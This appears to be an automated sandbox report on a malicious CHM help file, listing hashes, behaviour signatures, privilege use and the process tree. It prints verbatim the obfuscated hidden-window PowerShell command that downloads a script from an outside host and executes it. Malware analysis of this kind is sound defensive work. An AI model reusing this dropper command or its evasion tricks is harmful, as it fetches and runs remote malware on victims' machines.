Analysis
- max time kernel: 50s
- max time network: 76s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 08-12-2022 11:15
Static task
- static1

Behavioral task
- behavioral1
  Sample: mel9.chm
  Resource: win7-20220812-en (windows7-x64)
  6 signatures, 150 seconds

Behavioral task
- behavioral2
  Sample: mel9.chm
  Resource: win10v2004-20221111-en (windows10-2004-x64)
  9 signatures, 150 seconds
General
- Target: mel9.chm
- Size: 13KB
- MD5: e7a3bc55f52eebb6ce7df0a0047fec40
- SHA1: b152e0d6abc8dab4500aaa4161dac968e54cad20
- SHA256: 908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
- SHA512: 3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
- SSDEEP: 192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv

Score
- 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs:
  ps1.dropper: https://cricot2.kylos.pl/mel9.txt
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   process
    6     1372  powershell.exe
    7     1372  powershell.exe
- Modifies Internet Explorer settings
  Processes:
    description  ioc                                                                                                  process
    Key created  \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main  hh.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    1372  powershell.exe
- Suspicious use of AdjustPrivilegeToken (21 IoCs)
  Processes:
    description                          pid   process
    Token: SeDebugPrivilege              1372  powershell.exe
    Token: SeIncreaseQuotaPrivilege      1372  powershell.exe
    Token: SeSecurityPrivilege           1372  powershell.exe
    Token: SeTakeOwnershipPrivilege      1372  powershell.exe
    Token: SeLoadDriverPrivilege         1372  powershell.exe
    Token: SeSystemProfilePrivilege      1372  powershell.exe
    Token: SeSystemtimePrivilege         1372  powershell.exe
    Token: SeProfSingleProcessPrivilege  1372  powershell.exe
    Token: SeIncBasePriorityPrivilege    1372  powershell.exe
    Token: SeCreatePagefilePrivilege     1372  powershell.exe
    Token: SeBackupPrivilege             1372  powershell.exe
    Token: SeRestorePrivilege            1372  powershell.exe
    Token: SeShutdownPrivilege           1372  powershell.exe
    Token: SeDebugPrivilege              1372  powershell.exe
    Token: SeSystemEnvironmentPrivilege  1372  powershell.exe
    Token: SeRemoteShutdownPrivilege     1372  powershell.exe
    Token: SeUndockPrivilege             1372  powershell.exe
    Token: SeManageVolumePrivilege       1372  powershell.exe
    Token: 33                            1372  powershell.exe
    Token: 34                            1372  powershell.exe
    Token: 35                            1372  powershell.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid   process
    1912  hh.exe
    1912  hh.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                       pid   process  target process
    PID 1912 wrote to memory of 1372  1912  hh.exe   powershell.exe
    PID 1912 wrote to memory of 1372  1912  hh.exe   powershell.exe
    PID 1912 wrote to memory of 1372  1912  hh.exe   powershell.exe
Processes
- C:\Windows\hh.exe
  Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (nested under hh.exe in the process tree)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1372-55-0x0000000000000000-mapping.dmp
- memory/1372-57-0x000007FEF1BD0000-0x000007FEF25F3000-memory.dmp (Filesize: 10.1MB)
- memory/1372-58-0x000007FEEDD90000-0x000007FEEE8ED000-memory.dmp (Filesize: 11.4MB)
- memory/1372-59-0x0000000002734000-0x0000000002737000-memory.dmp (Filesize: 12KB)
- memory/1372-60-0x000000000273B000-0x000000000275A000-memory.dmp (Filesize: 124KB)
- memory/1372-61-0x0000000002734000-0x0000000002737000-memory.dmp (Filesize: 12KB)
- memory/1372-62-0x000000000273B000-0x000000000275A000-memory.dmp (Filesize: 124KB)
- memory/1912-54-0x000007FEFB831000-0x000007FEFB833000-memory.dmp (Filesize: 8KB)